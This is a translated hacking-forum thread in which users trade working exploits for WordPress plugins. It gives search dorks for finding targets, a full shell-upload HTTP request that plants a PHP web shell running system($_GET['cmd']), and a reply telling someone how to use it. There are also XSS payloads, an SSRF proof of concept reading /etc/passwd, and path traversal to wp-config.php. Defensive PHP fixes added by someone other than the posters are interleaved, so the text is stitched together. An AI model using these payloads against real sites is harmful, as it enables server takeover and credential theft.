[ Overview of WordPress vulnerabilities ]

Discussion in 'Web vulnerabilities' started by ettee, 5 Oct 2007.

  1. попугай

    попугай Elder

    Isn't there an anti-CSRF hash there?
     
  2. grimnir

    grimnir Members of Antichat

    https://wpvulndb.com/
    daily updates of WP vulnerabilities
     
  3. grimnir

    grimnir Members of Antichat

    https://github.com/dionach/CMSmap
    CMSmap is a vulnerability scanner for the popular CMSs WordPress, Joomla and Drupal.
    Essentially an analogue of WPScan, except it can be used on Windows, plus web shell support.
     
  4. grimnir

    grimnir Members of Antichat

    https://github.com/joren485/WP-Slimstat-SQLI
    a script for exploiting the WP-Slimstat bug
    http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

    https://github.com/delvelabs/vane GPL fork of the well-known WPScan scanner
     
    #304 grimnir, 5 Mar 2015
    Last edited: 11 Mar 2015
  5. winstrool

    winstrool ~~*MasterBlind*~~

    MAC PHOTO GALLERY v. 2.7

    MAC PHOTO GALLERY
    dork: inurl:plugins/mac-dock-gallery/ download
    @version:2.7

    Vulnerable code:
    PHP:
    // $_GET['albid'] is appended to the uploads path without any sanitisation
    $file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    POC:
    PATCH:
    https://wordpress.org/plugins/mac-dock-gallery/other_notes/
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    WordPress 4.2 stored XSS

     
  7. ICQ Hool

    ICQ Hool Elder

    WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
    Code:
    WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
    # Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File Upload
    # Author: SANTHO ( @s4n7h0 )
    # Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
    # Category: WebApp / CMS / Wordpress
    # Version: 2.0.63 and less
    ---------------------------------------------------
    Vulnerability Tracking
    ======================
    Reported to vendor : Fri, May 9, 2014 at 9:20 PM
    Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
    Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at 7:54 PM
    Vulnerability Details
    =======================
    POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1
    Host: target_ip
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
    Content-Length: 630
    Content-Type: multipart/form-data; boundary=---------------------------2427186578189
    Cookie: X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42; wp-settings-time-1=1399030444
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    -----------------------------2427186578189
    Content-Disposition: form-data; name="name"

    cmd.php.jpg
    -----------------------------2427186578189
    Content-Disposition: form-data; name="file"; filename="cmd.php"
    Content-Type: image/jpeg

    <HTML><BODY>
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <?
    if($_GET['cmd']) {
      system($_GET['cmd']);
      }
    ?>
    </pre>
    </BODY></HTML>
    The Shell can be accessible at following URL
    http://[target-ip]/wp-content/gallery/folder_name/cmd.php
            #  1337day.com  #
    Could someone please tell me how to use this thing?
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    you need to send a POST request and, while sending it, change the extension from jpg to php
    the shell will be at /wp-content/gallery/folder_name/shell.php
     
  9. kingbeef

    kingbeef Reservists Of Antichat

    And there is an XSS in the same place

    Code:
    http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1"><img src=x onerror=alert(1)//">&limit=42
     
  10. VY_CMa

    VY_CMa Green member

    Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
    Affected Versions: 4.2.1 and probably below

    Proof of Concept URL for DOM XSS in WordPress:

    Code:
    http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#<img/src/onerror=alert(123)>
    Source: http://seclists.org/bugtraq/2015/May/56
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Guarantor - Escrow Service

    Or a vector like this one for Chrome

     
  12. SuNDowN

    SuNDowN Member

    But don't you need admin rights for that?
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    The following bug was published publicly:
    https://www.exploit-db.com/exploits/37166/ - WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload
    While analysing the bug and the studio that released the vulnerable component, additional vulnerable components, themes and standalone scripts containing this vulnerable file were found as well.

    here are the products of theirs that I came across containing this vulnerable file:

    the vulnerable code itself:
    PHP:
    <?php

    /*
    * DZS Upload
    * version: 1.0
    * author: digitalzoomstudio
    * website: http://digitalzoomstudio.net
    *
    * Dual licensed under the MIT and GPL licenses:
    *   http://www.opensource.org/licenses/mit-license.php
    *   http://www.gnu.org/licenses/gpl.html
    */

    $disallowed_filetypes = array('.php', '.exe', '.htaccess', '.asp', '.py', '.jsp', '.pl'); // this line changes the set of extensions depending on the product
    $upload_dir = dirname(__FILE__) . '/upload';

    function get_theheaders() {
        //$headers = array();
        //print_r($_SERVER);
        return $_SERVER;
    }

    //print_r($_POST); print_r($HTTP_POST_FILES); print_r($_FILES);

    if (isset($_FILES['file_field']['tmp_name'])) {
        $file_name = $_FILES['file_field']['name'];
        $file_name = str_replace(" ", "_", $file_name); // strip spaces
        $path = $upload_dir . "/" . $file_name;
        //print_r($HTTP_POST_FILES);
        //==== checking for disallowed file types
        $sw = false;

        foreach ($disallowed_filetypes as $dft) {
            $pos = strpos($file_name, $dft); // substring blacklist on the client-supplied name
            if ($pos !== false) {
                $sw = true;
            }
        }

        if ($sw == true) {
            die('<div class="error">invalid extension - disallowed_filetypes</div><script>hideFeedbacksCall()</script>');
        }
        if (!is_writable($upload_dir)) {
            die('<div class="error">dir not writable - check permissions</div><script>hideFeedbacksCall()</script>');
        }

        if (copy($_FILES['file_field']['tmp_name'], $path)) {
            echo '<div class="success">file uploaded</div><script>top.hideFeedbacksCall();</script>';
        } else {
            echo '<div class="error">file could not be uploaded</div><script>window.hideFeedbacksCall()</script>';
        }
    } else {
        $headers = get_theheaders();
        if (isset($headers['HTTP_X_FILE_NAME'])) {
            //print_r($headers);
            $file_name = $headers['HTTP_X_FILE_NAME']; // file name taken from a request header
            $file_name = str_replace(" ", "_", $file_name); // strip spaces
            $target = $upload_dir . "/" . $file_name;

            //==== checking for disallowed file types
            $sw = false;

            foreach ($disallowed_filetypes as $dft) {
                $pos = strpos($file_name, $dft);
                if ($pos !== false) {
                    $sw = true;
                }
            }

            if ($sw == true) {
                die('<div class="error">invalid extension - disallowed_filetypes</div>');
            }

            if (!is_writable($upload_dir)) {
                die('<div class="error">dir not writable - check permissions</div>');
            }

            //echo $target;
            $content = file_get_contents("php://input"); // raw request body is written as-is

            if (file_put_contents($target, $content)) {
                echo 'success';
            } else {
                die('<div class="error">error at file_put_contents</div>');
            }
        } else {
            die('not for direct access');
        }
    }
    the longest line with a set of extensions that I came across was this one:
    $disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');

    but whoever understands this piece of code:
    PHP:
    foreach ($disallowed_filetypes as $dft) {
        $pos = strpos($file_name, $dft);
        if ($pos !== false) {
            $sw = true;
        }
    }
    will understand that it is no obstacle for us ;-)

    Passive XSS:

    wp-content/plugins/dzs-videogallery/ajax.php?source="/><script>alert();</script>
    wp-content/plugins/dzs-videogallery/ajax.php?type="/><script>alert();</script>

    http://digitalzoomstudio.net/ - the author's blog
    http://codecanyon.net/user/ZoomIt/portfolio - portfolio of the components for sale

    P.S.: tags for Google)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit
     
    #314 winstrool, 4 Jun 2015
    Last edited: 5 Jun 2015
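    Added here as an example (not part of the post or of DZS Upload): the allowlist check a maintainer would put in place of the substring blacklist above, deciding on the final extension and on the detected content type, and storing the file under a server-generated name. The helper names, the allowed-type map and the use of move_uploaded_file() are assumptions.

```php
<?php
// Added example (not from the post or from DZS Upload): allowlist checks that
// replace the strpos() blacklist shown above. Names and the allowed set are assumptions.

$upload_dir = dirname(__FILE__) . '/upload'; // same directory as the original

// Permitted extensions mapped to the MIME type the file content must report.
$dzs_allowed_types = array(
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'mp3'  => 'audio/mpeg',
);

// Returns a safe on-disk name, or false if the upload must be rejected.
function dzs_safe_upload_name($client_name, $tmp_path, array $allowed) {
    // The client name must be a plain base name: no traversal, no NUL bytes.
    if ($client_name !== basename($client_name) || strpos($client_name, "\0") !== false) {
        return false;
    }
    // Only the final extension matters, compared case-insensitively against an allowlist;
    // a list of "bad" substrings is never consulted.
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return false;
    }
    // Check the content as well as the name: the detected MIME type must match the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmp_path) !== $allowed[$ext]) {
        return false;
    }
    // Never reuse the client-supplied name: store under a random name with the validated extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Usage in the $_FILES branch, replacing `$path = $upload_dir . "/" . $file_name;`.
if (isset($_FILES['file_field']['tmp_name']) && is_uploaded_file($_FILES['file_field']['tmp_name'])) {
    $safe = dzs_safe_upload_name($_FILES['file_field']['name'],
                                 $_FILES['file_field']['tmp_name'], $dzs_allowed_types);
    if ($safe === false) {
        die('<div class="error">invalid file</div>');
    }
    // move_uploaded_file() instead of copy(); keep $upload_dir non-executable (no PHP handler).
    move_uploaded_file($_FILES['file_field']['tmp_name'], $upload_dir . '/' . $safe);
}
```

    The HTTP_X_FILE_NAME branch needs the same decision on the raw body (finfo::buffer() on the php://input data) before anything is written to disk.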
  14. masolit

    masolit Member

    And how does one get around that?
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

  16. blackbox

    blackbox Elder

  17. avin

    avin Member

    yes, it will pass
     
  18. Sleep

    Sleep Elder

    WP 3D Twitter Wall
    Code:
    # Vendor: https://wordpress.org/plugins/3d-twitter-wall/
    #/wp-content/plugins/3d-twitter-wall/proxy.php
    
    $url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
    ...
    $session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
    ...
    $response = curl_exec($session);
    echo $response;
    curl_close($session);
    
    POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd
     
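    Added example, not from the post or from the 3D Twitter Wall plugin: a guarded replacement for the proxy's curl_init($url) that rejects non-web schemes such as the file:// URL in the POC and only fetches from an allowlisted host. The host list and the function names are assumptions.

```php
<?php
// Added example (not from the post or the 3d-twitter-wall plugin): a guarded
// replacement for `curl_init($_GET['url'])` in proxy.php. The host allowlist is an assumption.

$proxy_allowed_hosts = array('api.twitter.com'); // assumption: the only upstream the proxy needs

// Returns the URL if it may be fetched, otherwise false.
function proxy_validate_url($url, array $allowed_hosts) {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // file://, gopher://, dict:// and friends are rejected; only web schemes pass.
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return false;
    }
    // No credentials in the URL, and the host must match the allowlist exactly.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    if (!in_array(strtolower($parts['host']), $allowed_hosts, true)) {
        return false;
    }
    return $url;
}

// Fetches through cURL with the same protocol lock-down applied at the transport layer.
function proxy_fetch($url) {
    $session = curl_init($url);
    curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($session, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($session, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($session, CURLOPT_FOLLOWLOCATION, false); // a redirect must not re-open the door
    curl_setopt($session, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($session);
    curl_close($session);
    return $response;
}

$raw = isset($_POST['url']) ? $_POST['url'] : (isset($_GET['url']) ? $_GET['url'] : '');
$url = proxy_validate_url($raw, $proxy_allowed_hosts);
if ($url === false) {
    http_response_code(400);
    exit('invalid url');
}
echo proxy_fetch($url);
```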
  19. grimnir

    grimnir Members of Antichat

    WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
    Code:
    # Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
    # Date: 2015-07-10
    # Google Dork:
    # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
    # Vendor Homepage: http://wordpress.dwbooster.com/
    # Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
    # Version: 1.0.5
    # Tested on: windows 7 + firefox.
    
    ====================
    DESCRIPTION
    ====================
    
    A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
    The vulnerability allows remote attackers to download arbitrary files from the server.
    The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.
    
    The web vulnerability can be exploited by remote attackers without privileged application user account
    and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
    in application compromise.
    
    ==============
    POC
    ==============
    
       # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&[email protected]&f=../../../../wp-config.php HTTP/1.1
      
       the purchase_id parameter can be bruteforced and successfully exploit this vulnerability.
    
      
    ==================
    VULNERABLE CODE
    ==================
    
    Located in cp-image-store.php
    
    function cpis_download_file(){
        ...
           
        if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
            header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
            header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
            if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
                readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
            }else{
                @unlink( CPIS_DOWNLOAD.'/.htaccess');
                header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
            }
        ...
    }
    
     
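    Added example serving both download handlers in this thread (the MAC Photo Gallery albid code and the CP Image Store f parameter above); it is not code from either post or plugin. It resolves the requested name against a fixed base directory and refuses anything that resolves outside it; directory and function names are assumptions.

```php
<?php
// Added example (not from either post or either plugin): one containment check that
// fixes both readfile() patterns above, `.../uploads/mac-dock-gallery/".$_GET['albid']`
// and `CPIS_DOWNLOAD.'/'.$_REQUEST['f']`. Directory and parameter names are assumptions.

// Returns the absolute path of the requested file if it lies inside $base_dir, else false.
function resolve_download_path($base_dir, $requested) {
    $base = realpath($base_dir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return false;
    }
    // realpath() resolves symlinks and ".." and returns false for a missing target,
    // so a probe for a non-existent file fails closed as well.
    $full = realpath($base . '/' . $requested);
    if ($full === false || !is_file($full)) {
        return false;
    }
    // The resolved path must start with the base directory plus a separator; otherwise
    // "../../../../wp-config.php" (or a sibling directory sharing the prefix) gets through.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $full;
}

// Streams a contained file with the headers the MAC Photo Gallery handler sends.
function send_download($base_dir, $requested) {
    $file = resolve_download_path($base_dir, $requested);
    if ($file === false) {
        http_response_code(404);
        exit;
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

// In place of the albid handler; the download root is fixed server-side.
$download_root = dirname(dirname(dirname(__FILE__))) . '/uploads/mac-dock-gallery';
send_download($download_root, isset($_GET['albid']) ? (string) $_GET['albid'] : '');
```

    For CP Image Store the purchase authorisation check still belongs in front of this; containment replaces only the unchecked concatenation, not the permission check.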